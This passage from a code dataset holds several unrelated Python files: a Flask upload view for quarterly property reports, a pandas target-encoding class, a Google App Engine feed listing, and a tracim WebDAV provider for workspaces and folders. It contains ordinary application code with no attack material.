amp.routes.user.models import *\n\n\nimport pandas as pd\nimport datetime\n\nportal = Blueprint('portal', __name__, url_prefix='/portal')\n\n\n@portal.route('/quarterly-report-portal/', methods=['POST', 'GET'])\n@portal.route('/quarterly-report-portal/<errors>', methods=['POST', 'GET'])\ndef quarterly_report_portal(errors=None):\n    # todo: pull in qr data to date\n    reports = SelectAssetManagementReport()\n    if errors is not None:\n        errors = ast.literal_eval(errors)\n        if 'no_report' in errors.keys():\n            flash('please select report type', 'warning')\n            return render_template('portals/quarterly_reports.html', form=reports, errors=None)\n        return render_template('portals/quarterly_reports.html', form=reports, errors=errors)\n\n    return render_template('portals/quarterly_reports.html', form=reports, errors=errors)\n\n\n@portal.route('/uploader', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        try:\n            file = request.files['file']\n            if file:\n                filename = secure_filename(file.filename)\n                selected_report = request.form['myField']\n                file_path = os.path.join(BaseConfig.UPLOAD_FOLDER, filename)\n                res = report_handler(selected_report, filename, file_path, file)\n                if isinstance(res, dict):\n                    return redirect(url_for('portal.quarterly_report_portal', errors=res))\n                if res == 1:\n                    flash('upload successful', 'success')\n                    return redirect(url_for('portal.quarterly_report_portal'))\n            else:\n                return redirect(url_for('portal.quarterly_report_portal'))\n        except HTTPException:\n            # todo: catch and report the failure properly\n            return redirect(url_for('portal.quarterly_report_portal'))\n    return redirect(url_for('portal.quarterly_report_portal'))\n\n\ndef report_handler(report_id, file_name, file_path, file):\n    # todo: check on filename, headers, property names, etc\n    if report_id == 'None':\n        return {'no_report': None}\n    quarter, report = file_name.split('-')\n    quarter = quarter.replace(\"_\", \"\")\n    report = report.replace(\"_\", \" \").split(\".\")[0].strip().lower()\n    # first check quarter\n    today = datetime.date.today()\n    ldq = get_last_day_of_the_quarter(today).date()\n    if report_id == '1':\n        if report == 'distribution and valuations summary':\n            file.save(file_path)\n            df = pd.read_excel(file_path)\n            properties = Property.get_report_level_properties()\n            property_names_list = [i.property_name for i in properties]\n            invalid_properties = [i for i in df['property_name'].values.tolist() if i not in property_names_list]\n            if invalid_properties:\n                return {'invalid_properties': invalid_properties}\n            property_name_pid_map = {i.property_name: i.pid for i in properties}\n            df[\"property_id\"] = df['property_name'].map(property_name_pid_map)\n            del df['property_name']\n            df['date'] = ldq\n            df = df.applymap(lambda x: x.strip() if isinstance(x, str) else x)\n            df = df.where(pd.notnull(df), null())\n            recs = df.to_dict('records')\n            db_records = [QuarterlyReportMetrics(**rec) for rec in recs]\n            for rec in db_records:\n                try:\n                    db.session.add(rec)\n                    db.session.commit()\n                except Exception:\n                    db.session.rollback()\n                    db.session.flush()\n            return 1\n        elif report == \"\":\n            pass\n\n    elif report_id == '2':\n        # valuations report\n        pass\n    elif report_id == '3':\n        # occupancy report\n        pass\n\n\n\ndef get_quarter(date):\n    # integer division, so the result can be used as a month number below\n    return (date.month - 1) // 3 + 1\n\n\ndef get_prior_quarter(date):\n    return (date.month - 1) // 3\n\n\ndef get_first_day_of_the_quarter(date):\n    quarter = get_quarter(date)\n    return datetime.datetime(date.year, 3 * quarter - 2, 1)\n\n\ndef get_last_day_of_the_quarter(date):\n    quarter = get_prior_quarter(date)\n    month = 3 * quarter\n    remaining = month / 12\n    return 
datetime.datetime(date.year + int(remaining), int(month) % 12 + 1, 1) + datetime.timedelta(days=-1)","sub_path":"amp/routes/portals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243253910","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\n\n\nclass TargetEncoder(object):\n    \"\"\"\n    Target encoding as in the paper by Daniele Micci-Barreca available at:\n    https://kaggle2.blob.core.windows.net/forum-message-attachments/225952/7441/high%20cardinality%20categoricals.pdf\n    \"\"\"\n\n    def __init__(self, smoothing=1, min_samples=1, noise_level=0):\n        \"\"\"\n        min_samples (int): minimum samples to use category average\n        smoothing (int): smoothing effect to balance category average vs prior\n        noise_level (int): add jitter to encoded values\n        \"\"\"\n        self.smoothing = smoothing\n        self.min_samples = min_samples\n        self.noise_level = noise_level\n\n    def _add_noise(self, series):\n        return series * (1 + self.noise_level * np.random.randn(len(series)))\n\n    def _get_averages(self, series, target):\n        temp = pd.concat([series, target], axis=1)\n        # Compute target mean\n        averages = (temp.groupby(by=series.name)[target.name].\n                    agg([\"mean\", \"count\"]))\n        # Compute smoothing\n        smoothing = 1 / (1 + np.exp(-(averages[\"count\"] - self.min_samples) /\n                                    self.smoothing))\n        # Apply average function to all target data\n        prior = target.mean()\n        # The bigger the count the less full_avg is taken into account\n        averages[target.name] = (prior * (1 - smoothing) +\n                                 averages[\"mean\"] * smoothing)\n        averages.drop([\"mean\", \"count\"], axis=1, inplace=True)\n        # rename() returns a new frame, so assign the result back to expose the 'average' column\n        averages = averages.reset_index().rename(columns={'index': target.name,\n                                                          target.name: 'average'})\n        return averages\n\n    def _apply_averages(self, series, averages, fill_val):\n        tmp = (pd.merge(series.to_frame(series.name), averages,\n                        on=series.name, how='left')['average'].\n               rename(series.name + '_mean').fillna(fill_val))\n        tmp.index = series.index\n        return tmp\n\n    def encode(self, train_series=None, test_series=None, target=None):\n        \"\"\"\n        train_series: training categorical feature as a pd.Series\n        test_series: test categorical feature as a pd.Series\n        target: target values as a pd.Series\n        \"\"\"\n        assert len(train_series) == len(target)\n        assert train_series.name == test_series.name\n        averages = self._get_averages(train_series, target)\n        # Apply averages to train and test series\n        prior = target.mean()\n        ft_train_series = self._apply_averages(train_series, averages, prior)\n        ft_test_series = self._apply_averages(test_series, averages, prior)\n        return {'train': self._add_noise(ft_train_series),\n                'test': self._add_noise(ft_test_series)}\n","sub_path":"code/utils/target_encoder.py","file_name":"target_encoder.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"110346416","text":"# -*- coding: utf-8 -*-\nfrom google.appengine.ext import ndb\nfrom ndb_models import Account, CUser, Vesy, Feed\n\n\nclass LatestVesys:\n\tdef __init__(self, sipri):\n\t\tself.sipri = sipri\n\n\n\tdef get_latest_vesys(self):\n\t\t# Latest vesy (scales)\n\t\tsipri = self.sipri\n\t\tgoodness = sipri.goodness\n\t\tuser_id = self.sipri.user_id\n\t\t\n\t\t# fetch the list of new vesy\n\t\t# ----Initialization----\n\t\tpage_size = sipri.default_page_size\n\t\tmax_c_str = sipri.rqh.request.get('c')\n\t\tmax_i_str = sipri.rqh.request.get('i')\n\t\tif max_c_str:\n\t\t\tmax_c = goodness.from_timestamp(milliseconds = int(max_c_str))\n\t\t\tmax_i = int(max_i_str)\n\t\telse:\n\t\t\tmax_c = max_i = None\n\t\tmore = None\n\t\t\n\t\t# ----Build the query----\n\t\t# for a signed-in user\n\t\tif user_id:\n\t\t\t#Feed: s c f i k p l t.\n\t\t\tfq = Feed.query(\n\t\t\t\tndb.OR(\n\t\t\t\t\tFeed.s == 1,\n\t\t\t\t\tndb.AND(Feed.s == user_id, ndb.OR(Feed.p == 8, Feed.p == 0))\n\t\t\t\t)\n\t\t\t)\n\t\t# for an anonymous user\n\t\telse:\n\t\t\tfq = Feed.query(Feed.s == 1)\n\t\t\n\t\t# ----Get the cursor----\n\t\tfq = sipri.set_cursor_filter(fq, max_c, max_i)\n\t\tfs = fq.fetch(page_size + 1) # Fetch.\n\t\tmore, max_c, max_i, len_fs, last_feed = sipri.get_cursor(fs, page_size) # Get the new cursor.\n\t\t\n\t\t# ----Turn the ids into keys----\n\t\tkeys = []\n\t\tfor i in range(0, len_fs): # if more is set, skip the last feed: it was only fetched to detect more\n\t\t\tf = fs[i]\n\t\t\tkey = ndb.Key(Account, f.f, Vesy, f.i)\n\t\t\tkeys.append(key)\n\t\t\n\t\t# ----Fetch the vesy by key----\n\t\tvesys = ndb.get_multi(keys)\n\t\tvesys_list_header = u'Новые решения:' # 'New decisions:'\n\t\t\n\t\tif more:\n\t\t\tmax_c = goodness.to_timestamp(max_c)\n\t\t\tmore_url = goodness.replace_or_add_qs_param(sipri.rqh.request.uri, 'c', max_c)\n\t\t\tmore_url = goodness.replace_or_add_qs_param(more_url, 'i', max_i)\n\t\telse:\n\t\t\tmore_url = None\n\t\t\n\t\tvesys_props = {\n\t\t\t'vesys': vesys,\n\t\t\t'vesys_list_header': vesys_list_header,\n\t\t\t'more_url': more_url,\n\t\t\t}\n\t\treturn vesys_props\n\n\n\tdef get_and_draw_latest_vesys(self):\n\t\t# render the vesy list\n\t\tvesys_props = self.get_latest_vesys()\n\t\tvesys_list_html = self.sipri.vesy_view.draw_vesys_list(vesys_props['vesys'])\n\t\tvesys_props['vesys_list_html'] = vesys_list_html\n\t\treturn vesys_props\n\n\n\tdef get_and_draw_latest_vesys_page(self):\n\t\tvesys_props = self.get_and_draw_latest_vesys()\n\t\tvesy_props = self.sipri.vesy_view.get_and_draw_one_vesy(self.sipri.acc, None, None) if not self.sipri.help_showed else None\n\t\tavp = self.sipri.author_view.get_author_view_props(self.sipri.acc)\n\t\tauthor_block, vcard = self.sipri.author_view.draw_author_block(avp)\n\t\tprops = {\n\t\t\t'avp': avp,\n\t\t\t'author_block': author_block,\n\t\t\t'vcard': vcard,\n\t\t\t'vesys_props': vesys_props,\n\t\t\t'vesy_props': vesy_props,\n\t\t\t'sipri': self.sipri,\n\t\t\t'path_id': self.sipri.path_id,\n\t\t\t'user_id': self.sipri.user_id,\n\t\t\t}\n\t\ttemplate = self.sipri.JINJA_ENVIRONMENT.get_template('templates/latest-vesys.html')\n\t\thtml = template.render(props)\n\t\tself.sipri.rqh.response.write(html)\n\n\n","sub_path":"latest_vesys.py","file_name":"latest_vesys.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28912023","text":"# coding: utf8\nimport logging\n\nimport os\n\nimport tg\nimport transaction\nimport typing\nimport re\nfrom datetime import datetime\nfrom time import mktime\nfrom os.path import dirname, basename\n\nfrom tracim.lib.content import ContentApi\nfrom tracim.lib.user import UserApi\nfrom tracim.lib.webdav import HistoryType\nfrom tracim.lib.webdav import FakeFileStream\nfrom tracim.lib.webdav.utils import transform_to_display\nfrom tracim.lib.webdav.utils import transform_to_bdd\nfrom tracim.lib.workspace import WorkspaceApi\nfrom tracim.model import data, new_revision\nfrom tracim.model.data import Content, ActionDescription\nfrom tracim.model.data import ContentType\nfrom tracim.lib.webdav.design 
import designThread, designPage\n\nfrom wsgidav import compat\nfrom wsgidav.dav_error import DAVError, HTTP_FORBIDDEN\nfrom wsgidav.dav_provider import DAVCollection, DAVNonCollection\nfrom wsgidav.dav_provider import _DAVResource\nfrom tracim.lib.webdav.utils import normpath\n\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\n\nlogger = logging.getLogger()\n\n\nclass ManageActions(object):\n    \"\"\"\n    This object is used to encapsulate all deletion/archiving related methods, so as not to duplicate too much code\n    \"\"\"\n    def __init__(self, action_type: str, api: ContentApi, content: Content):\n        self.content_api = api\n        self.content = content\n\n        self._actions = {\n            ActionDescription.ARCHIVING: self.content_api.archive,\n            ActionDescription.DELETION: self.content_api.delete,\n            ActionDescription.UNARCHIVING: self.content_api.unarchive,\n            ActionDescription.UNDELETION: self.content_api.undelete\n        }\n\n        self._to_name = {\n            ActionDescription.ARCHIVING: 'archived',\n            ActionDescription.DELETION: 'deleted'\n        }\n\n        self._type = action_type\n        self._new_name = self.make_name()\n\n    def action(self):\n        try:\n            # When undeleting/unarchiving we expect no content with the new name to exist, thus if we\n            # don't get an error and the database request sends back a result, we stop the action\n            self.content_api.get_one_by_label_and_parent(self._new_name, self.content.parent)\n            raise DAVError(HTTP_FORBIDDEN)\n        except NoResultFound:\n            with new_revision(self.content):\n                self.content_api.update_content(self.content, self._new_name)\n                self._actions[self._type](self.content)\n                self.content_api.save(self.content, self._type)\n\n            transaction.commit()\n\n    def make_name(self) -> str:\n        \"\"\"\n        Will create the new name, either by adding '- deleted the [date]' after the name when archiving/deleting or\n        removing this string when undeleting/unarchiving\n        \"\"\"\n        new_name = self.content.get_label_as_file()\n        extension = ''\n\n        # if the content has no label, the last .ext is important\n        # thus we want to rename a file from 'file.txt' to 'file - deleted... .txt' and not 'file.txt - deleted...'\n        is_file_name = self.content.label == ''\n        if is_file_name:\n            search = re.search(r'(\\.[^.]+)$', new_name)\n            if search:\n                extension = search.group(0)\n                new_name = re.sub(r'(\\.[^.]+)$', '', new_name)\n\n        if self._type in [ActionDescription.ARCHIVING, ActionDescription.DELETION]:\n            new_name += ' - %s the %s' % (self._to_name[self._type], datetime.now().strftime('%d-%m-%Y at %H:%M'))\n        else:\n            new_name = re.sub(\n                r'( - (%s|%s) the .*)$' % (self._to_name[ActionDescription.DELETION], self._to_name[ActionDescription.ARCHIVING]),\n                '',\n                new_name\n            )\n\n        new_name += extension\n\n        return new_name\n\n\nclass Root(DAVCollection):\n    \"\"\"\n    Root resource that represents tracim's home, which contains all workspaces\n    \"\"\"\n\n    def __init__(self, path: str, environ: dict):\n        super(Root, self).__init__(path, environ)\n\n        self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n        # TODO BS 20170221: Web interface should list all workspaces too. We\n        # disable it here for the moment. 
When the web interface is updated to\n        # list all workspaces, change this here too.\n        self.workspace_api = WorkspaceApi(self.user, force_role=True)\n\n    def __repr__(self) -> str:\n        return '<DAVCollection: Root>'\n\n    def getMemberNames(self) -> [str]:\n        \"\"\"\n        This method returns the names (here workspace's labels) of all its children\n\n        Though for performance issues, we're not using this function anymore\n        \"\"\"\n        return [workspace.label for workspace in self.workspace_api.get_all()]\n\n    def getMember(self, label: str) -> DAVCollection:\n        \"\"\"\n        This method returns the child Workspace that corresponds to a given name\n\n        Though for performance issues, we're not using this function anymore\n        \"\"\"\n        try:\n            workspace = self.workspace_api.get_one_by_label(label)\n            workspace_path = '%s%s%s' % (self.path, '' if self.path == '/' else '/', transform_to_display(workspace.label))\n\n            return Workspace(workspace_path, self.environ, workspace)\n        except AttributeError:\n            return None\n\n    def createEmptyResource(self, name: str):\n        \"\"\"\n        This method is called whenever the user wants to create a DAVNonCollection resource (files in our case).\n\n        There we don't allow to create files at the root;\n        only workspaces (thus collection) can be created.\n        \"\"\"\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def createCollection(self, name: str):\n        \"\"\"\n        This method is called whenever the user wants to create a DAVCollection resource as a child (in our case,\n        we create workspaces as this is the root).\n\n        [For now] we don't allow to create new workspaces through\n        webdav client. Though if we come to allow it, deleting the error's raise will\n        make it possible.\n        \"\"\"\n        # TODO : remove comment here\n        # raise DAVError(HTTP_FORBIDDEN)\n\n        new_workspace = self.workspace_api.create_workspace(name)\n        self.workspace_api.save(new_workspace)\n\n        workspace_path = '%s%s%s' % (\n            self.path, '' if self.path == '/' else '/', transform_to_display(new_workspace.label))\n\n        transaction.commit()\n        return Workspace(workspace_path, self.environ, new_workspace)\n\n    def getMemberList(self):\n        \"\"\"\n        This method is called by wsgidav when requesting with a depth > 0, it will return a list of _DAVResource\n        of all its direct children\n        \"\"\"\n\n        members = []\n        for workspace in self.workspace_api.get_all():\n            workspace_path = '%s%s%s' % (self.path, '' if self.path == '/' else '/', workspace.label)\n            members.append(Workspace(workspace_path, self.environ, workspace))\n\n        return members\n\n\nclass Workspace(DAVCollection):\n    \"\"\"\n    Workspace resource corresponding to tracim's workspaces.\n    Direct children can only be folders, though files might come later on and are supported\n    \"\"\"\n\n    def __init__(self, path: str, environ: dict, workspace: data.Workspace):\n        super(Workspace, self).__init__(path, environ)\n\n        self.workspace = workspace\n        self.content = None\n        self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n\n        self.content_api = ContentApi(self.user, show_temporary=True)\n\n        self._file_count = 0\n\n    def __repr__(self) -> str:\n        return \"<DAVCollection: Workspace (%d)>\" % self.workspace.workspace_id\n\n    def getPreferredPath(self):\n        return self.path\n\n    def getCreationDate(self) -> float:\n        return mktime(self.workspace.created.timetuple())\n\n    def getDisplayName(self) -> str:\n        return self.workspace.label\n\n    def getLastModified(self) -> float:\n        return mktime(self.workspace.updated.timetuple())\n\n    def getMemberNames(self) -> [str]:\n        retlist = []\n\n        children = self.content_api.get_all(\n            parent_id=self.content.id if self.content is not None else 
None,\n            workspace=self.workspace\n        )\n\n        for content in children:\n            # the purpose is to display .history only if there's at least one content's type that has a history\n            if content.type != ContentType.Folder:\n                self._file_count += 1\n            retlist.append(content.get_label_as_file())\n\n        return retlist\n\n    def getMember(self, content_label: str) -> _DAVResource:\n\n        return self.provider.getResourceInst(\n            '%s/%s' % (self.path, transform_to_display(content_label)),\n            self.environ\n        )\n\n    def createEmptyResource(self, file_name: str):\n        \"\"\"\n        [For now] we don't allow to create files right under workspaces.\n        Though if we come to allow it, deleting the error's raise will make it possible.\n        \"\"\"\n        # TODO : remove comment here\n        # raise DAVError(HTTP_FORBIDDEN)\n        if '/.deleted/' in self.path or '/.archived/' in self.path:\n            raise DAVError(HTTP_FORBIDDEN)\n\n        content = None\n\n        # Note: To prevent bugs, check here again if the resource already exists\n        path = os.path.join(self.path, file_name)\n        resource = self.provider.getResourceInst(path, self.environ)\n        if resource:\n            content = resource.content\n\n        return FakeFileStream(\n            file_name=file_name,\n            content_api=self.content_api,\n            workspace=self.workspace,\n            content=content,\n            parent=self.content,\n            path=self.path + '/' + file_name\n        )\n\n    def createCollection(self, label: str) -> 'Folder':\n        \"\"\"\n        Create a new folder for the current workspace. As it's not possible for the user to choose\n        which types of content are allowed in this folder, we allow all of them.\n\n        This method returns the DAVCollection created.\n        \"\"\"\n\n        if '/.deleted/' in self.path or '/.archived/' in self.path:\n            raise DAVError(HTTP_FORBIDDEN)\n\n        folder = self.content_api.create(\n            content_type=ContentType.Folder,\n            workspace=self.workspace,\n            label=label,\n            parent=self.content\n        )\n\n        subcontent = dict(\n            folder=True,\n            thread=True,\n            file=True,\n            page=True\n        )\n\n        self.content_api.set_allowed_content(folder, subcontent)\n        self.content_api.save(folder)\n\n        transaction.commit()\n\n        # Folder's signature is (path, environ, workspace, content)\n        return Folder('%s/%s' % (self.path, transform_to_display(label)),\n                      self.environ, self.workspace,\n                      folder)\n\n    def delete(self):\n        \"\"\"For now, it is not possible to delete a workspace through the webdav client.\"\"\"\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def supportRecursiveMove(self, destpath):\n        return True\n\n    def moveRecursive(self, destpath):\n        if dirname(normpath(destpath)) == self.environ['http_authenticator.realm']:\n            self.workspace.label = basename(normpath(destpath))\n            transaction.commit()\n        else:\n            raise DAVError(HTTP_FORBIDDEN)\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n\n        children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n        for content in children:\n            content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n            if content.type == ContentType.Folder:\n                members.append(Folder(content_path, self.environ, self.workspace, content))\n            elif content.type == ContentType.File:\n                self._file_count += 1\n                members.append(File(content_path, self.environ, content))\n            else:\n                self._file_count += 1\n                members.append(OtherFile(content_path, self.environ, content))\n\n        if self._file_count > 0 and self.provider.show_history():\n            members.append(\n                HistoryFolder(\n                    path=self.path + '/' + \".history\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace,\n                    type=HistoryType.Standard\n                )\n            )\n\n        if self.provider.show_delete():\n            members.append(\n                DeletedFolder(\n                    path=self.path + '/' + \".deleted\",\n                    
environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace\n                )\n            )\n\n        if self.provider.show_archive():\n            members.append(\n                ArchivedFolder(\n                    path=self.path + '/' + \".archived\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace\n                )\n            )\n\n        return members\n\n\nclass Folder(Workspace):\n    \"\"\"\n    Folder resource corresponding to tracim's folders.\n    Direct children can only be either folders, files, pages or threads\n    By default when creating new folders, we allow them to contain all types of content\n    \"\"\"\n\n    def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content):\n        super(Folder, self).__init__(path, environ, workspace)\n\n        self.content = content\n\n    def __repr__(self) -> str:\n        return \"<DAVCollection: Folder (%s)>\" % self.content.label\n\n    def getCreationDate(self) -> float:\n        return mktime(self.content.created.timetuple())\n\n    def getDisplayName(self) -> str:\n        return transform_to_display(self.content.get_label_as_file())\n\n    def getLastModified(self) -> float:\n        return mktime(self.content.updated.timetuple())\n\n    def delete(self):\n        ManageActions(ActionDescription.DELETION, self.content_api, self.content).action()\n\n    def supportRecursiveMove(self, destpath: str):\n        return True\n\n    def moveRecursive(self, destpath: str):\n        \"\"\"\n        As we support recursive move, copymovesingle won't be called, though with copy it'll be called\n        but I have to check if the client ever calls that function...\n        \"\"\"\n        destpath = normpath(destpath)\n\n        invalid_path = False\n\n        # if content is either deleted or archived, we'll check that we try moving it to the parent\n        # if yes, then we'll unarchive / undelete them, else the action's not allowed\n        if self.content.is_deleted or self.content.is_archived:\n            # we remove all archived and deleted from the path and we check that the destpath\n            # is equal, or else the path is not valid\n            # ex: /a/b/.deleted/resource, to be valid destpath has to be = /a/b/resource (no other solution)\n            current_path = re.sub(r'/\\.(deleted|archived)', '', self.path)\n\n            if current_path == destpath:\n                ManageActions(\n                    ActionDescription.UNDELETION if self.content.is_deleted else ActionDescription.UNARCHIVING,\n                    self.content_api,\n                    self.content\n                ).action()\n            else:\n                invalid_path = True\n        # if the content is not deleted / archived, check if we're trying to delete / archive it by\n        # moving it to a .deleted / .archived folder\n        elif basename(dirname(destpath)) in ['.deleted', '.archived']:\n            # same test as above ^\n            dest_path = re.sub(r'/\\.(deleted|archived)', '', destpath)\n\n            if dest_path == self.path:\n                ManageActions(\n                    ActionDescription.DELETION if '.deleted' in destpath else ActionDescription.ARCHIVING,\n                    self.content_api,\n                    self.content\n                ).action()\n            else:\n                invalid_path = True\n        # else we check if the path is good (not at the root path / not in a deleted/archived path)\n        # and we move the content\n        else:\n            invalid_path = any(x in destpath for x in ['.deleted', '.archived'])\n            invalid_path = invalid_path or any(x in self.path for x in ['.deleted', '.archived'])\n            invalid_path = invalid_path or dirname(destpath) == self.environ['http_authenticator.realm']\n\n            if not invalid_path:\n                self.move_folder(destpath)\n\n        if invalid_path:\n            raise DAVError(HTTP_FORBIDDEN)\n\n    def move_folder(self, destpath):\n\n        workspace_api = WorkspaceApi(self.user)\n        workspace = self.provider.get_workspace_from_path(\n            normpath(destpath), workspace_api\n        )\n\n        parent = self.provider.get_parent_from_path(\n            normpath(destpath),\n            self.content_api,\n            
workspace\n        )\n\n        with new_revision(self.content):\n            if basename(destpath) != self.getDisplayName():\n                self.content_api.update_content(self.content, transform_to_bdd(basename(destpath)))\n                self.content_api.save(self.content)\n            else:\n                if workspace.workspace_id == self.content.workspace.workspace_id:\n                    self.content_api.move(self.content, parent)\n                else:\n                    self.content_api.move_recursively(self.content, parent, workspace)\n\n        transaction.commit()\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n        content_api = ContentApi(self.user)\n        visible_children = content_api.get_all(\n            self.content.content_id,\n            ContentType.Any,\n            self.workspace,\n        )\n\n        for content in visible_children:\n            content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n            try:\n                if content.type == ContentType.Folder:\n                    members.append(Folder(content_path, self.environ, self.workspace, content))\n                elif content.type == ContentType.File:\n                    self._file_count += 1\n                    members.append(File(content_path, self.environ, content))\n                else:\n                    self._file_count += 1\n                    members.append(OtherFile(content_path, self.environ, content))\n            except Exception as exc:\n                logger.exception(\n                    'Unable to construct member {}'.format(\n                        content_path,\n                    ),\n                    exc_info=True,\n                )\n\n        if self._file_count > 0 and self.provider.show_history():\n            members.append(\n                HistoryFolder(\n                    path=self.path + '/' + \".history\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace,\n                    type=HistoryType.Standard\n                )\n            )\n\n        if self.provider.show_delete():\n            members.append(\n                DeletedFolder(\n                    path=self.path + '/' + \".deleted\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace\n                )\n            )\n\n        if self.provider.show_archive():\n            members.append(\n                ArchivedFolder(\n                    path=self.path + '/' + \".archived\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace\n                )\n            )\n\n        return members\n\n\nclass HistoryFolder(Folder):\n    \"\"\"\n    A virtual resource which contains a sub-folder for every file (DAVNonCollection) contained in the parent\n    folder\n    \"\"\"\n\n    def __init__(self, path, environ, workspace: data.Workspace,\n                 content: data.Content=None, type: str=HistoryType.Standard):\n        super(HistoryFolder, self).__init__(path, environ, workspace, content)\n\n        self._is_archived = type == HistoryType.Archived\n        self._is_deleted = type == HistoryType.Deleted\n\n        self.content_api = ContentApi(\n            current_user=self.user,\n            show_archived=self._is_archived,\n            show_deleted=self._is_deleted\n        )\n\n    def __repr__(self) -> str:\n        return \"<DAVCollection: HistoryFolder (%s)>\" % self.content.file_name\n\n    def getCreationDate(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getDisplayName(self) -> str:\n        return '.history'\n\n    def getLastModified(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getMember(self, content_label: str) -> _DAVResource:\n        content = self.content_api.get_one_by_label_and_parent(\n            content_label=content_label,\n            content_parent=self.content\n        )\n\n        return HistoryFileFolder(\n            path='%s/%s' % (self.path, content.get_label_as_file()),\n            environ=self.environ,\n            content=content)\n\n    def getMemberNames(self) -> [str]:\n        ret = []\n\n        content_id = None if self.content is None else self.content.id\n        for content in self.content_api.get_all(content_id, ContentType.Any, self.workspace):\n            if (self._is_archived and content.is_archived or\n                self._is_deleted and content.is_deleted or\n                not (content.is_archived or self._is_archived or content.is_deleted or self._is_deleted))\\\n                    and content.type 
!= ContentType.Folder:\n                ret.append(content.get_label_as_file())\n\n        return ret\n\n    def createEmptyResource(self, name: str):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def createCollection(self, name: str):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def delete(self):\n        raise DAVError(HTTP_FORBIDDEN)\n\n    def handleDelete(self):\n        return True\n\n    def handleCopy(self, destPath: str, depthInfinity):\n        return True\n\n    def handleMove(self, destPath: str):\n        return True\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n\n        if self.content:\n            children = self.content.children\n        else:\n            children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n        for content in children:\n            if content.is_archived == self._is_archived and content.is_deleted == self._is_deleted:\n                members.append(HistoryFileFolder(\n                    path='%s/%s' % (self.path, content.get_label_as_file()),\n                    environ=self.environ,\n                    content=content))\n\n        return members\n\n\nclass DeletedFolder(HistoryFolder):\n    \"\"\"\n    A virtual resource which exists for every folder or workspace and contains their deleted children\n    \"\"\"\n\n    def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content=None):\n        super(DeletedFolder, self).__init__(path, environ, workspace, content, HistoryType.Deleted)\n\n        self._file_count = 0\n\n    def __repr__(self):\n        return \"<DAVCollection: DeletedFolder (%s)>\" % self.content.file_name\n\n    def getCreationDate(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getDisplayName(self) -> str:\n        return '.deleted'\n\n    def getLastModified(self) -> float:\n        return mktime(datetime.now().timetuple())\n\n    def getMember(self, content_label) -> _DAVResource:\n\n        content = self.content_api.get_one_by_label_and_parent(\n            content_label=content_label,\n            content_parent=self.content\n        )\n\n        return self.provider.getResourceInst(\n            path='%s/%s' % (self.path, transform_to_display(content.get_label_as_file())),\n            environ=self.environ\n        )\n\n    def getMemberNames(self) -> [str]:\n        retlist = []\n\n        if self.content:\n            children = self.content.children\n        else:\n            children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n        for content in children:\n            if content.is_deleted:\n                retlist.append(content.get_label_as_file())\n\n                if content.type != ContentType.Folder:\n                    self._file_count += 1\n\n        return retlist\n\n    def getMemberList(self) -> [_DAVResource]:\n        members = []\n\n        if self.content:\n            children = self.content.children\n        else:\n            children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n        for content in children:\n            if content.is_deleted:\n                content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n                if content.type == ContentType.Folder:\n                    members.append(Folder(content_path, self.environ, self.workspace, content))\n                elif content.type == ContentType.File:\n                    self._file_count += 1\n                    members.append(File(content_path, self.environ, content))\n                else:\n                    self._file_count += 1\n                    members.append(OtherFile(content_path, self.environ, content))\n\n        if self._file_count > 0 and self.provider.show_history():\n            members.append(\n                HistoryFolder(\n                    path=self.path + '/' + \".history\",\n                    environ=self.environ,\n                    content=self.content,\n                    workspace=self.workspace,\n                    type=HistoryType.Standard\n                )\n            )\n\n        return members\n\n\nclass ArchivedFolder(HistoryFolder):\n    \"\"\"\n    A virtual resource which exists for every folder or workspace and contains their archived children\n    \"\"\"\n    def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content=None):\n        super(ArchivedFolder, self).__init__(path, environ, 
